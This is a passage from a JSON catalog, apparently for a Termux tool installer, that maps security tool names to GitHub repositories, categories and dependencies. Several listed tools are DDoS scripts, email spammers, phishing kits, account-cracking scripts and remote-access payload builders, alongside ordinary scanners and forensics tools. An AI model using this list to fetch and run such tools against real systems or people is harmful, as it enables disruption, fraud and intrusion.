"EggShell", 317 | "category" : [null], 318 | "url" : "https://github.com/neoneggplant/EggShell.git", 319 | "package_manager" : "git", 320 | "dependency" : ["python","git"] 321 | }, 322 | "Email-Spammer" : { 323 | "name" : "Email-Spammer", 324 | "package_name" : "Email-Spammer", 325 | "category" : [null], 326 | "url" : "https://github.com/Juniorn1003/Email-Spammer.git", 327 | "package_manager" : "git", 328 | "dependency" : ["python","git"] 329 | }, 330 | "Empire" : { 331 | "name" : "Empire", 332 | "package_name" : "Empire", 333 | "category" : [null], 334 | "url" : "https://github.com/EmpireProject/Empire.git", 335 | "package_manager" : "git", 336 | "dependency" : ["git"] 337 | }, 338 | "EvilURL" : { 339 | "name" : "EvilURL", 340 | "package_name" : "EvilURL", 341 | "category" : ["information_gathering"], 342 | "url" : "https://github.com/UndeadSec/EvilURL.git", 343 | "package_manager" : "git", 344 | "dependency" : ["python","git"] 345 | }, 346 | "ExploitOnCLI" : { 347 | "name" : "ExploitOnCLI", 348 | "package_name" : "ExploitOnCLI", 349 | "category" : ["exploitation_tools"], 350 | "url" : "https://github.com/r00tmars/ExploitOnCLI.git", 351 | "package_manager" : "git", 352 | "dependency" : ["php","git"] 353 | }, 354 | "EyeWitness" : { 355 | "name" : "EyeWitness", 356 | "package_name" : "EyeWitness", 357 | "category" : ["information_gathering"], 358 | "url" : "https://github.com/FortyNorthSecurity/EyeWitness.git", 359 | "package_manager" : "git", 360 | "dependency" : ["python","git"] 361 | }, 362 | "FBUPv2.0" : { 363 | "name" : "FBUPv2.0", 364 | "package_name" : "FBUPv2.0", 365 | "category" : [null], 366 | "url" : "https://github.com/mrSilent0598/FBUPv2.0.git", 367 | "package_manager" : "git", 368 | "dependency" : ["python","git"] 369 | }, 370 | "FakeImageExploiter" : { 371 | "name" : "FakeImageExploiter", 372 | "package_name" : "FakeImageExploiter", 373 | "category" : [null], 374 | "url" : "https://github.com/r00t-3xp10it/FakeImageExploiter.git", 375 | "package_manager" : "git", 376 | "dependency" : ["git"] 377 | }, 378 | "Findsploit" : { 379 | "name" : "Findsploit", 380 | "package_name" : "Findsploit", 381 | "category" : [null], 382 | "url" : "https://github.com/1N3/Findsploit.git", 383 | "package_manager" : "git", 384 | "dependency" : ["git"] 385 | }, 386 | "Gemail-Hack" : { 387 | "name" : "Gemail-Hack", 388 | "package_name" : "Gemail-Hack", 389 | "category" : [null], 390 | "url" : "https://github.com/Ha3MrX/Gemail-Hack.git", 391 | "package_manager" : "git", 392 | "dependency" : ["python","git"] 393 | }, 394 | "Gloom-Framework" : { 395 | "name" : "Gloom-Framework", 396 | "package_name" : "Gloom-Framework", 397 | "category" : [null], 398 | "url" : "https://github.com/StreetSec/Gloom-Framework.git", 399 | "package_manager" : "git", 400 | "dependency" : ["python","git"] 401 | }, 402 | "GoblinWordGenerator" : { 403 | "name" : "GoblinWordGenerator", 404 | "package_name" : "GoblinWordGenerator", 405 | "category" : [null], 406 | "url" : "https://github.com/UndeadSec/GoblinWordGenerator.git", 407 | "package_manager" : "git", 408 | "dependency" : ["python","git"] 409 | }, 410 | "GoldenEye" : { 411 | "name" : "GoldenEye", 412 | "package_name" : "GoldenEye", 413 | "category" : ["stress_testing"], 414 | "url" : "https://github.com/jseidl/GoldenEye.git", 415 | "package_manager" : "git", 416 | "dependency" : ["python","git"] 417 | }, 418 | "HT-WPS-Breaker" : { 419 | "name" : "HT-WPS-Breaker", 420 | "package_name" : "HT-WPS-Breaker", 421 | "category" : [null], 422 | "url" : "https://github.com/SilentGhostX/HT-WPS-Breaker.git", 423 | "package_manager" : "git", 424 | "dependency" : ["git"] 425 | }, 426 | "HTools" : { 427 | "name" : "HTools", 428 | "package_name" : "HTools", 429 | "category" : [null], 430 | "url" : "https://github.com/mehedishakeel/HTools.git", 431 | "package_manager" : "git", 432 | "dependency" : ["git"] 433 | }, 434 | "Hash-Buster" : { 435 | "name" : "Hash-Buster", 436 | "package_name" : "Hash-Buster", 437 | "category" : ["password_attack"], 438 | "url" : "https://github.com/UltimateHackers/Hash-Buster.git", 439 | "package_manager" : "git", 440 | "dependency" : ["python","git"] 441 | }, 442 | "Hatch" : { 443 | "name" : "Hatch", 444 | "package_name" : "Hatch", 445 | "category" : [null], 446 | "url" : "https://github.com/MetaChar/Hatch.git", 447 | "package_manager" : "git", 448 | "dependency" : ["python","git"] 449 | }, 450 | "HiddenEye" : { 451 | "name" : "HiddenEye", 452 | "package_name" : "HiddenEye", 453 | "category" : [null], 454 | "url" : "https://github.com/DarkSecDevelopers/HiddenEye.git", 455 | "package_manager" : "git", 456 | "dependency" : ["python","git"] 457 | }, 458 | "Hunner" : { 459 | "name" : "Hunner", 460 | "package_name" : "Hunner", 461 | "category" : [null], 462 | "url" : "https://github.com/b3-v3r/Hunner.git", 463 | "package_manager" : "git", 464 | "dependency" : ["python","git"] 465 | }, 466 | "IP-FY" : { 467 | "name" : "IP-FY", 468 | "package_name" : "IP-FY", 469 | "category" : ["information_gathering","ip_tracking"], 470 | "url" : "https://github.com/T4P4N/IP-FY.git", 471 | "package_manager" : "git", 472 | "dependency" : ["python","git"] 473 | }, 474 | "IP-Locator" : { 475 | "name" : "IP-Locator", 476 | "package_name" : "IP-Locator", 477 | "category" : [null], 478 | "url" : "https://github.com/zanyarjamal/IP-Locator.git", 479 | "package_manager" : "git", 480 | "dependency" : ["perl","git"] 481 | }, 482 | "IP-Tracer" : { 483 | "name" : "IP-Tracer", 484 | "package_name" : "IP-Tracer", 485 | "category" : ["information_gathering","ip_tracking"], 486 | "url" : "https://github.com/Rajkumrdusad/IP-Tracer", 487 | "package_manager" : "git", 488 | "dependency" : ["php","git"] 489 | }, 490 | "IP-Tracker" : { 491 | "name" : "IP-Tracker", 492 | "package_name" : "IP-Tracker", 493 | "category" : ["information_gathering","ip_tracking"], 494 | "url" : "https://github.com/KasRoudra/IP-Tracker", 495 | "package_manager" : "git", 496 | "dependency" : ["php","git","curl","wget","unzip"] 497 | }, 498 | "IPGeoLocation" : { 499 | "name" : "IPGeoLocation", 500 | "package_name" : "IPGeoLocation", 501 | "category" : ["ip_tracking"], 502 | "url" : "https://github.com/maldevel/IPGeoLocation.git", 503 | "package_manager" : "git", 504 | "dependency" : ["python","git"] 505 | }, 506 | "InSpy" : { 507 | "name" : "InSpy", 508 | "package_name" : "InSpy", 509 | "category" : ["information_gathering"], 510 | "url" : "https://github.com/leapsecurity/InSpy.git", 511 | "package_manager" : "git", 512 | "dependency" : ["python","git"] 513 | }, 514 | "Infoga" : { 515 | "name" : "Infoga", 516 | "package_name" : "Infoga", 517 | "category" : ["information_gathering"], 518 | "url" : "https://github.com/m4ll0k/Infoga.git", 519 | "package_manager" : "git", 520 | "dependency" : ["python","git"] 521 | }, 522 | "Instahack" : { 523 | "name" : "Instahack", 524 | "package_name" : "Instahack", 525 | "category" : [null], 526 | "url" : "https://github.com/avramit/Instahack.git", 527 | "package_manager" : "git", 528 | "dependency" : ["python","git"] 529 | }, 530 | "Intersect-2.5" : { 531 | "name" : "Intersect-2.5", 532 | "package_name" : "Intersect-2.5", 533 | "category" : ["maintaining_access"], 534 | "url" : "https://github.com/deadbits/Intersect-2.5.git", 535 | "package_manager" : "git", 536 | "dependency" : ["python","git"] 537 | }, 538 | "JohnTheRipper" : { 539 | "name" : "JohnTheRipper", 540 | "package_name" : "JohnTheRipper", 541 | "category" : ["password_attack"], 542 | "url" : "https://github.com/magnumripper/JohnTheRipper.git", 543 | "package_manager" : "git", 544 | "dependency" : ["clang","gcc","g++","git"] 545 | }, 546 | "JTRE" : { 547 | "name" : "JTRE", 548 | "package_name" : "JTRE", 549 | "category" : ["password_attack"], 550 | "url" : "https://github.com/ASHWIN990/JTRE.git", 551 | "package_manager" : "git", 552 | "dependency" : ["python","git"] 553 | }, 554 | "KatanaFramework" : { 555 | "name" : "KatanaFramework", 556 | "package_name" : "KatanaFramework", 557 | "category" : [null], 558 | "url" : "https://github.com/PowerScript/KatanaFramework.git", 559 | "package_manager" : "git", 560 | "dependency" : ["python","git"] 561 | }, 562 | "KnockMail" : { 563 | "name" : "KnockMail", 564 | "package_name" : "KnockMail", 565 | "category" : ["sniffing_spoofing"], 566 | "url" : "https://github.com/4w4k3/KnockMail.git", 567 | "package_manager" : "git", 568 | "dependency" : ["python","git"] 569 | }, 570 | "LALIN" : { 571 | "name" : "LALIN", 572 | "package_name" : "LALIN", 573 | "category" : [null], 574 | "url" : "https://github.com/Screetsec/LALIN.git", 575 | "package_manager" : "git", 576 | "dependency" : ["git"] 577 | }, 578 | "LFISuite" : { 579 | "name" : "LFISuite", 580 | "package_name" : "LFISuite", 581 | "category" : [null], 582 | "url" : "https://github.com/D35m0nd142/LFISuite.git", 583 | "package_manager" : "git", 584 | "dependency" : ["python","git"] 585 | }, 586 | "LITEDDOS" : { 587 | "name" : "LITEDDOS", 588 | "package_name" : "LITEDDOS", 589 | "category" : ["ddos"], 590 | "url" : "https://github.com/4L13199/LITEDDOS.git", 591 | "package_manager" : "git", 592 | "dependency" : ["python","git"] 593 | }, 594 | "LITESPAM" : { 595 | "name" : "LITESPAM", 596 | "package_name" : "LITESPAM", 597 | "category" : [null], 598 | "url" : "https://github.com/4L13199/LITESPAM.git", 599 | "package_manager" : "git", 600 | "dependency" : ["php","git"] 601 | }, 602 | "Lazymux" : { 603 | "name" : "Lazymux", 604 | "package_name" : "Lazymux", 605 | "category" : [null], 606 | "url" : "https://github.com/Gameye98/Lazymux.git", 607 | "package_manager" : "git", 608 | "dependency" : ["python","git"] 609 | }, 610 | "Leaked" : { 611 | "name" : "Leaked", 612 | "package_name" : "Leaked", 613 | "category" : [null], 614 | "url" : "https://github.com/GitHackTools/Leaked.git", 615 | "package_manager" : "git", 616 | "dependency" : ["python","git"] 617 | }, 618 | "Mercury" : { 619 | "name" : "Mercury", 620 | "package_name" : "Mercury", 621 | "category" : [null], 622 | "url" : "https://github.com/MetaChar/Mercury.git", 623 | "package_manager" : "git", 624 | "dependency" : ["python","git"] 625 | }, 626 | "Meterpreter_Paranoid_Mode-SSL" : { 627 | "name" : "Meterpreter_Paranoid_Mode-SSL", 628 | "package_name" : "Meterpreter_Paranoid_Mode-SSL", 629 | "category" : ["exploitation_tools"], 630 | "url" : "https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL.git", 631 | "package_manager" : "git", 632 | "dependency" : ["git"] 633 | }, 634 | "MyServer" : { 635 | "name" : "MyServer", 636 | "package_name" : "MyServer", 637 | "category" : ["web_server"], 638 | "url" : "https://github.com/Rajkumrdusad/MyServer.git", 639 | "package_manager" : "git", 640 | "dependency" : ["python","git"] 641 | }, 642 | "Nethunter-In-Termux" : { 643 | "name" : "Nethunter-In-Termux", 644 | "package_name" : "Nethunter-In-Termux", 645 | "category" : [null], 646 | "url" : "https://github.com/Hax4us/Nethunter-In-Termux.git", 647 | "package_manager" : "git", 648 | "dependency" : ["git"] 649 | }, 650 | "OSIF" : { 651 | "name" : "OSIF", 652 | "package_name" : "OSIF", 653 | "category" : ["information_gathering"], 654 | "url" : "https://github.com/ciku370/OSIF.git", 655 | "package_manager" : "git", 656 | "dependency" : ["python","git"] 657 | }, 658 | "PadBuster" : { 659 | "name" : "PadBuster", 660 | "package_name" : "PadBuster", 661 | "category" : ["web_hacking"], 662 | "url" : "https://github.com/AonCyberLabs/PadBuster.git", 663 | "package_manager" : "git", 664 | "dependency" : ["perl","git"] 665 | }, 666 | "Parat" : { 667 | "name" : "Parat", 668 | "package_name" : "Parat", 669 | "category" : [null], 670 | "url" : "https://github.com/micle-fm/Parat.git", 671 | "package_manager" : "git", 672 | "dependency" : ["python","git"] 673 | }, 674 | "Parsero" : { 675 | "name" : "Parsero", 676 | "package_name" : "Parsero", 677 | "category" : ["information_gathering"], 678 | "url" : "https://github.com/behindthefirewalls/Parsero.git", 679 | "package_manager" : "git", 680 | "dependency" : ["python","git"] 681 | }, 682 | "PiDense" : { 683 | "name" : "PiDense", 684 | "package_name" : "PiDense", 685 | "category" : [null], 686 | "url" : "https://github.com/WiPi-Hunter/PiDense.git", 687 | "package_manager" : "git", 688 | "dependency" : ["python","git"] 689 | }, 690 | "Planetwork-DDOS" : { 691 | "name" : "Planetwork-DDOS", 692 | "package_name" : "Planetwork-DDOS", 693 | "category" : ["ddos","stress_testing"], 694 | "url" : "https://github.com/Hydra7/Planetwork-DDOS.git", 695 | "package_manager" : "git", 696 | "dependency" : ["python","git"] 697 | }, 698 | "PowerSploit" : { 699 | "name" : "PowerSploit", 700 | "package_name" : "PowerSploit", 701 | "category" : ["maintaining_access"], 702 | "url" : "https://github.com/PowerShellMafia/PowerSploit.git", 703 | "package_manager" : "git", 704 | "dependency" : ["git"] 705 | }, 706 | "PwnSTAR" : { 707 | "name" : "PwnSTAR", 708 | "package_name" : "PwnSTAR", 709 | "category" : [null], 710 | "url" : "https://github.com/SilverFoxx/PwnSTAR.git", 711 | "package_manager" : "git", 712 | "dependency" : ["python","git"] 713 | }, 714 | "PyBozoCrack" : { 715 | "name" : "PyBozoCrack", 716 | "package_name" : "PyBozoCrack", 717 | "category" : [null], 718 | "url" : "https://github.com/ikkebr/PyBozoCrack.git", 719 | "package_manager" : "git", 720 | "dependency" : ["python","git"] 721 | }, 722 | "Pybelt" : { 723 | "name" : "Pybelt", 724 | "package_name" : "Pybelt", 725 | "category" : [null], 726 | "url" : "https://github.com/Ekultek/Pybelt.git", 727 | "package_manager" : "git", 728 | "dependency" : ["python","git"] 729 | }, 730 | "Pyrit" : { 731 | "name" : "Pyrit", 732 | "package_name" : "Pyrit", 733 | "category" : ["wireless_testing"], 734 | "url" : "https://github.com/JPaulMora/Pyrit.git", 735 | "package_manager" : "git", 736 | "dependency" : ["python","clang","gcc","git"] 737 | }, 738 | "QRLJacking" : { 739 | "name" : "QRLJacking", 740 | "package_name" : "QRLJacking", 741 | "category" : [null], 742 | "url" : "https://github.com/OWASP/QRLJacking.git", 743 | "package_manager" : "git", 744 | "dependency" : ["python","git"] 745 | }, 746 | "RED_HAWK" : { 747 | "name" : "RED_HAWK", 748 | "package_name" : "RED_HAWK", 749 | "category" : ["information_gathering","vulnerability_scanner"], 750 | "url" : "https://github.com/Tuhinshubhra/RED_HAWK.git", 751 | "package_manager" : "git", 752 | "dependency" : ["php","git"] 753 | }, 754 | "RTLSDR-Scanner" : { 755 | "name" : "RTLSDR-Scanner", 756 | "package_name" : "RTLSDR-Scanner", 757 | "category" : ["wireless_testing"], 758 | "url" : "https://github.com/EarToEarOak/RTLSDR-Scanner.git", 759 | "package_manager" : "git", 760 | "dependency" : ["python","git"] 761 | }, 762 | "ReconDog" : { 763 | "name" : "ReconDog", 764 | "package_name" : "ReconDog", 765 | "category" : ["information_gathering"], 766 | "url" : "https://github.com/UltimateHackers/ReconDog.git", 767 | "package_manager" : "git", 768 | "dependency" : ["python","git"] 769 | }, 770 | "RegRipper2.8" : { 771 | "name" : "RegRipper2.8", 772 | "package_name" : "RegRipper2.8", 773 | "category" : ["forensics_tools"], 774 | "url" : "https://github.com/keydet89/RegRipper2.8.git", 775 | "package_manager" : "git", 776 | "dependency" : ["perl","git"] 777 | }, 778 | "Remot3d" : { 779 | "name" : "Remot3d", 780 | "package_name" : "Remot3d", 781 | "category" : [null], 782 | "url" : "https://github.com/KeepWannabe/Remot3d.git", 783 | "package_manager" : "git", 784 | "dependency" : ["git"] 785 | }, 786 | "Responder" : { 787 | "name" : "Responder", 788 | "package_name" : "Responder", 789 | "category" : ["sniffing_spoofing"], 790 | "url" : "https://github.com/lgandx/Responder.git", 791 | "package_manager" : "git", 792 | "dependency" : ["python","git"] 793 | }, 794 | "ReverseAPK" : { 795 | "name" : "ReverseAPK", 796 | "package_name" : "ReverseAPK", 797 | "category" : [null], 798 | "url" : "https://github.com/1N3/ReverseAPK.git", 799 | "package_manager" : "git", 800 | "dependency" : ["git"] 801 | }, 802 | "SCANNER-INURLBR" : { 803 | "name" : "SCANNER-INURLBR", 804 | "package_name" : "SCANNER-INURLBR", 805 | "category" : ["web_hacking"], 806 | "url" : "https://github.com/googleinurl/SCANNER-INURLBR.git", 807 | "package_manager" : "git", 808 | "dependency" : ["php","git"] 809 | }, 810 | "SET" : { 811 | "name" : "SET", 812 | "package_name" : "social-engineer-toolkit", 813 | "category" : ["information_gathering","exploitation_tools","password_attack","sniffing_spoofing"], 814 | "url" : "https://github.com/trustedsec/social-engineer-toolkit.git", 815 | "package_manager" : "git", 816 | "dependency" : ["python","git"] 817 | }, 818 | "SH33LL" : { 819 | "name" : "SH33LL", 820 | "package_name" : "SH33LL", 821 | "category" : ["vulnerability_scanner","web_hacking"], 822 | "url" : "https://github.com/LOoLzeC/SH33LL.git", 823 | "package_manager" : "git", 824 | "dependency" : ["python","git"] 825 | }, 826 | "SMBrute" : { 827 | "name" : "SMBrute", 828 | "package_name" : "SMBrute", 829 | "category" : [null], 830 | "url" : "https://github.com/m4ll0k/SMBrute.git", 831 | "package_manager" : "git", 832 | "dependency" : ["python","git"] 833 | }, 834 | "SecLists" : { 835 | "name" : "SecLists", 836 | "package_name" : "SecLists", 837 | "category" : ["password_attack"], 838 | "url" : "https://github.com/danielmiessler/SecLists.git", 839 | "package_manager" : "git", 840 | "dependency" : ["php","perl","git"] 841 | }, 842 | "Simple-Fuzzer" : { 843 | "name" : "Simple-Fuzzer", 844 | "package_name" : "Simple-Fuzzer", 845 | "category" : ["vulnerability_scanner"], 846 | "url" : "https://github.com/orgcandman/Simple-Fuzzer.git", 847 | "package_manager" : "git", 848 | "dependency" : ["clang","gcc","git"] 849 | }, 850 | "Sn1per" : { 851 | "name" : "Sn1per", 852 | "package_name" : "Sn1per", 853 | "category" : [null], 854 | "url" : "https://github.com/1N3/Sn1per.git", 855 | "package_manager" : "git", 856 | "dependency" : ["python","git"] 857 | }, 858 | "SocialBox" : { 859 | "name" : "SocialBox", 860 | "package_name" : "SocialBox", 861 | "category" : ["sniffing_spoofing"], 862 | "url" : "https://github.com/TunisianEagles/SocialBox.git", 863 | "package_manager" : "git", 864 | "dependency" : ["git"] 865 | }, 866 | "SocialFish" : { 867 | "name" : "SocialFish", 868 | "package_name" : "SocialFish", 869 | "category" : ["password_attack","sniffing_spoofing"], 870 | "url" : "https://github.com/UndeadSec/SocialFish.git", 871 | "package_manager" : "git", 872 | "dependency" : ["python","git"] 873 | }, 874 | "Spammer-Email" : { 875 | "name" : "Spammer-Email", 876 | "package_name" : "Spammer-Email", 877 | "category" : ["sniffing_spoofing"], 878 | "url" : "https://github.com/p4kl0nc4t/Spammer-Email.git", 879 | "package_manager" : "git", 880 | "dependency" : ["python","git"] 881 | }, 882 | "Spammer-Grab" : { 883 | "name" : "Spammer-Grab", 884 | "package_name" : "Spammer-Grab", 885 | "category" : ["sniffing_spoofing"], 886 | "url" : "https://github.com/p4kl0nc4t/Spammer-Grab.git", 887 | "package_manager" : "git", 888 | "dependency" : ["python","git"] 889 | }, 890 | "Stitch" : { 891 | "name" : "Stitch", 892 | "package_name" : "Stitch", 893 | "category" : [null], 894 | "url" : "https://github.com/nathanlopez/Stitch.git", 895 | "package_manager" : "git", 896 | "dependency" : ["python","git"] 897 | }, 898 | "Striker" : { 899 | "name" : "Striker", 900 | "package_name" : "Striker", 901 | "category" : ["vulnerability_scanner"], 902 | "url" : "https://github.com/s0md3v/Striker.git", 903 | "package_manager" : "git", 904 | "dependency" : ["python","git"] 905 | }, 906 | "Sublist3r" : { 907 | "name" : "Sublist3r", 908 | "package_name" : "Sublist3r", 909 | "category" : ["information_gathering"], 910 | "url" : "https://github.com/aboul3la/Sublist3r.git", 911 | "package_manager" : "git", 912 | "dependency" : ["python","git"] 913 | }, 914 | "TermuxAlpine" : { 915 | "name" : "TermuxAlpine", 916 | "package_name" : "TermuxAlpine", 917 | "category" : ["termux_os"], 918 | "url" : "https://github.com/Hax4us/TermuxAlpine.git", 919 | "package_manager" : "git", 920 | "dependency" : ["git","proot"] 921 | }, 922 | "Th3inspector" : { 923 | "name" : "Th3inspector", 924 | "package_name" : "Th3inspector", 925 | "category" : [null], 926 | "url" : "https://github.com/Moham3dRiahi/Th3inspector.git", 927 | "package_manager" : "git", 928 | "dependency" : ["perl","git"] 929 | }, 930 | "The-Eye" : { 931 | "name" : "The-Eye", 932 | "package_name" : "The-Eye", 933 | "category" : [null], 934 | "url" : "https://github.com/EgeBalci/The-Eye.git", 935 | "package_manager" : "git", 936 | "dependency" : ["golang","git"] 937 | }, 938 | "TheFatRat" : { 939 | "name" : "TheFatRat", 940 | "package_name" : "TheFatRat", 941 | "category" : [null], 942 | "url" : "https://github.com/Screetsec/TheFatRat.git", 943 | "package_manager" : "git", 944 | "dependency" : ["git"] 945 | }, 946 | "Tool-X" : { 947 | "name" : "Tool-X", 948 | "package_name" : "Tool-X", 949 | "category" : [null], 950 | "url" : "https://github.com/Rajkumrdusad/Tool-X.git", 951 | "package_manager" : "git", 952 | "dependency" : ["python","git"] 953 | }, 954 | "TorStat" : { 955 | "name" : "TorStat", 956 | "package_name" : "TorStat", 957 | "category" : [null], 958 | "url" : "https://github.com/s0cket7/TorStat.git", 959 | "package_manager" : "git", 960 | "dependency" : ["python","git"] 961 | }, 962 | "Trity" : { 963 | "name" : "Trity", 964 | "package_name" : "Trity", 965 | "category" : [null], 966 | "url" : "https://github.com/toxic-ig/Trity.git", 967 | "package_manager" : "git", 968 | "dependency" : ["python","git"] 969 | }, 970 | "Umbrella" : { 971 | "name" : "Umbrella", 972 | "package_name" : "Umbrella", 973 | "category" : [null], 974 | "url" : "https://github.com/4w4k3/Umbrella.git", 975 | "package_manager" : "git", 976 | "dependency" : ["git"] 977 | }, 978 | "Vegile" : { 979 | "name" : "Vegile", 980 | "package_name" : "Vegile", 981 | "category" : [null], 982 | "url" : "https://github.com/Screetsec/Vegile.git", 983 | "package_manager" : "git", 984 | "dependency" : ["git"] 985 | }, 986 | "WAScan" : { 987 | "name" : "WAScan", 988 | "package_name" : "WAScan", 989 | "category" : ["information_gathering","vulnerability_scanner","web_hacking"], 990 | "url" : "https://github.com/m4ll0k/WAScan.git", 991 | "package_manager" : "git", 992 | "dependency" : ["python","git"] 993 | }, 994 | "WP-plugin-scanner" : { 995 | "name" : "WP-plugin-scanner", 996 | "package_name" : "WP-plugin-scanner", 997 | "category" : ["web_hacking"], 998 | "url" : "https://github.com/mintobit/WP-plugin-scanner.git", 999 | "package_manager" : "git", 1000 | "dependency" : ["python","git"] 1001 | }, 1002 | "WPSeku" : { 1003 | "name" : "WPSeku", 1004 | "package_name" : "WPSeku", 1005 | "category" : [null], 1006 | "url" : "https://github.com/m4ll0k/WPSeku.git", 1007 | "package_manager" : "git", 1008 | "dependency" : ["python","git"] 1009 | }, 1010 | "WebScarab" : { 1011 | "name" : "WebScarab", 1012 | "package_name" : "OWASP-WebScarab", 1013 | "category" : ["web_hacking"], 1014 | "url" : "https://github.com/OWASP/OWASP-WebScarab.git", 1015 | "package_manager" : "git", 1016 | "dependency" : ["git"] 1017 | }, 1018 | "WebXploiter" : { 1019 | "name" : "WebXploiter", 1020 | "package_name" : "WebXploiter", 1021 | "category" : ["web_hacking","exploitation_tools"], 1022 | "url" : "https://github.com/a0xnirudh/WebXploiter.git", 1023 | "package_manager" : "git", 1024 | "dependency" : ["python","git"] 1025 | }, 1026 | "WhatWeb" : { 1027 | "name" : "WhatWeb", 1028 | "package_name" : "WhatWeb", 1029 | "category" : ["web_hacking"], 1030 | "url" : "https://github.com/urbanadventurer/WhatWeb.git", 1031 | "package_manager" : "git", 1032 | "dependency" : ["python","git"] 1033 | }, 1034 | "WiFi-Pumpkin" : { 1035 | "name" : "WiFi-Pumpkin", 1036 | "package_name" : "WiFi-Pumpkin", 1037 | "category" : ["wireless_testing"], 1038 | "url" : "https://github.com/P0cL4bs/WiFi-Pumpkin.git", 1039 | "package_manager" : "git", 1040 | "dependency" : ["python","git"] 1041 | }, 1042 | "WifiBruteCrack" : { 1043 | "name" : "WifiBruteCrack", 1044 | "package_name" : "WifiBruteCrack", 1045 | "category" : ["wireless_testing"], 1046 | "url" : "https://github.com/cinquemb/WifiBruteCrack.git", 1047 | "package_manager" : "git", 1048 | "dependency" : ["python","git"] 1049 | }, 1050 | "Winpayloads" : { 1051 | "name" : "Winpayloads", 1052 | "package_name" : "Winpayloads", 1053 | "category" : [null], 1054 | "url" : "https://github.com/nccgroup/Winpayloads.git", 1055 | "package_manager" : "git", 1056 | "dependency" : ["python","git"] 1057 | }, 1058 | "XAttacker" : { 1059 | "name" : "XAttacker", 1060 | "package_name" : "XAttacker", 1061 | "category" : ["vulnerability_scanner","web_hacking","exploitation_tools"], 1062 | "url" : "https://github.com/Moham3dRiahi/XAttacker.git", 1063 | "package_manager" : "git", 1064 | "dependency" : ["perl","php","git"] 1065 | }, 1066 | "XPL-SEARCH" : { 1067 | "name" : "XPL-SEARCH", 1068 | "package_name" : "XPL-SEARCH", 1069 | "category" : ["web_hacking"], 1070 | "url" : "https://github.com/r00tmars/XPL-SEARCH.git", 1071 | "package_manager" : "git", 1072 | "dependency" : ["php","git"] 1073 | }, 1074 | "XSStrike" : { 1075 | "name" : "XSStrike", 1076 | "package_name" : "XSStrike", 1077 | "category" : ["information_gathering","web_hacking"], 1078 | "url" : "https://github.com/s0md3v/XSStrike.git", 1079 | "package_manager" : "git", 1080 | "dependency" : ["python","git"] 1081 | }, 1082 | "Xshell" : { 1083 | "name" : "Xshell", 1084 | "package_name" : "Xshell", 1085 | "category" : ["vulnerability_scanner","web_hacking"], 1086 | "url" : "https://github.com/Manisso/Xshell.git", 1087 | "package_manager" : "git", 1088 | "dependency" : ["git"] 1089 | }, 1090 | "Zerodoor" : { 1091 | "name" : "Zerodoor", 1092 | "package_name" : "Zerodoor", 1093 | "category" : [null], 1094 | "url" : "https://github.com/Souhardya/Zerodoor.git", 1095 | "package_manager" : "git", 1096 | "dependency" : ["python","git"] 1097 | }, 1098 | "admin-panel-finder" : { 1099 | "name" : "admin-panel-finder", 1100 | "package_name" : "admin-panel-finder", 1101 | "category" : ["web_hacking"], 1102 | "url" : "https://github.com/bdblackhat/admin-panel-finder.git", 1103 | "package_manager" : "git", 1104 | "dependency" : ["python","git"] 1105 | }, 1106 | "air-hammer" : { 1107 | "name" : "air-hammer", 1108 | "package_name" : "air-hammer", 1109 | "category" : [null], 1110 | "url" : "https://github.com/Wh1t3Rh1n0/air-hammer.git", 1111 | "package_manager" : "git", 1112 | "dependency" : ["python","git"] 1113 | }, 1114 | "aircrack-ng" : { 1115 | "name" : "aircrack-ng", 1116 | "package_name" : "aircrack-ng", 1117 | "category" : ["wireless_testing"], 1118 | "url" : null, 1119 | "package_manager" : "package_manager", 1120 | "dependency" : [null] 1121 | }, 1122 | "airgeddon" : { 1123 | "name" : "airgeddon", 1124 | "package_name" : "airgeddon", 1125 | "category" : ["wireless_testing"], 1126 | "url" : "https://github.com/v1s1t0r1sh3r3/airgeddon.git", 1127 | "package_manager" : "git", 1128 | "dependency" : ["git"] 1129 | }, 1130 | "angryFuzzer" : { 1131 | "name" : "angryFuzzer", 1132 | "package_name" : "angryFuzzer", 1133 | "category" : [null], 1134 | "url" : "https://github.com/ihebski/angryFuzzer.git", 1135 | "package_manager" : "git", 1136 | "dependency" : ["python","git"] 1137 | }, 1138 | "apache2" : { 1139 | "name" : "apache2", 1140 | "package_name" : "apache2", 1141 | "category" : ["web_server","package"], 1142 | "url" : null, 1143 | "package_manager" : "package_manager", 1144 | "dependency" : [null] 1145 | }, 1146 | "apt2" : { 1147 | "name" : "apt2", 1148 | "package_name" : "apt2", 1149 | "category" : ["information_gathering"], 1150 | "url" : "https://github.com/MooseDojo/apt2.git", 1151 | "package_manager" : "git", 1152 | "dependency" : ["python","git"] 1153 | }, 1154 | "arch-linux" : { 1155 | "name" : "arch-linux", 1156 | "package_name" : "setupTermuxArch.sh", 1157 | "category" : ["termux_os"], 1158 | "url" : "https://raw.githubusercontent.com/sdrausty/TermuxArch/master/setupTermuxArch.sh", 1159 | "package_manager" : "curl", 1160 | "dependency" : ["curl","proot"] 1161 | }, 1162 | "arp-scan" : { 1163 | "name" : "arp-scan", 1164 | "package_name" : "arp-scan", 1165 | "category" : ["information_gathering"], 1166 | "url" : "https://github.com/royhills/arp-scan.git", 1167 | "package_manager" : "git", 1168 | "dependency" : ["clang","gcc","git"] 1169 | }, 1170 | "avet" : { 1171 | "name" : "avet", 1172 | "package_name" : "avet", 1173 | "category" : [null], 1174 | "url" : "https://github.com/govolution/avet.git", 1175 | "package_manager" : "git", 1176 | "dependency" : ["clang","gcc","git"] 1177 | }, 1178 | "bbqsql" : { 1179 | "name" : "bbqsql", 1180 | "package_name" : "bbqsql", 1181 | "category" : ["vulnerability_scanner"], 1182 | "url" : "https://github.com/Neohapsis/bbqsql.git", 1183 | "package_manager" : "git", 1184 | "dependency" : ["python","git"] 1185 | }, 1186 | "bed" : { 1187 | "name" : "bed", 1188 | "package_name" : "bed", 1189 | "category" : ["vulnerability_scanner"], 1190 | "url" : "https://gitlab.com/kalilinux/packages/bed.git", 1191 | "package_manager" : "git", 1192 | "dependency" : ["perl","git"] 1193 | }, 1194 | "beef" : { 1195 | "name" : "beef", 1196 | "package_name" : "beef", 1197 | "category" : ["exploitation_tools"], 1198 | "url" : "https://github.com/beefproject/beef.git", 1199 | "package_manager" : "git", 1200 | "dependency" : ["ruby","git"] 1201 | }, 1202 | "bettercap" : { 1203 | "name" : "bettercap", 1204 | "package_name" : "bettercap", 1205 | "category" : ["sniffing_spoofing"], 1206 | "url" : "https://github.com/bettercap/bettercap.git", 1207 | "package_manager" : "git", 1208 | "dependency" : ["golang","git"] 1209 | }, 1210 | "bing-ip2hosts" : { 1211 | "name" : "bing-ip2hosts", 1212 | 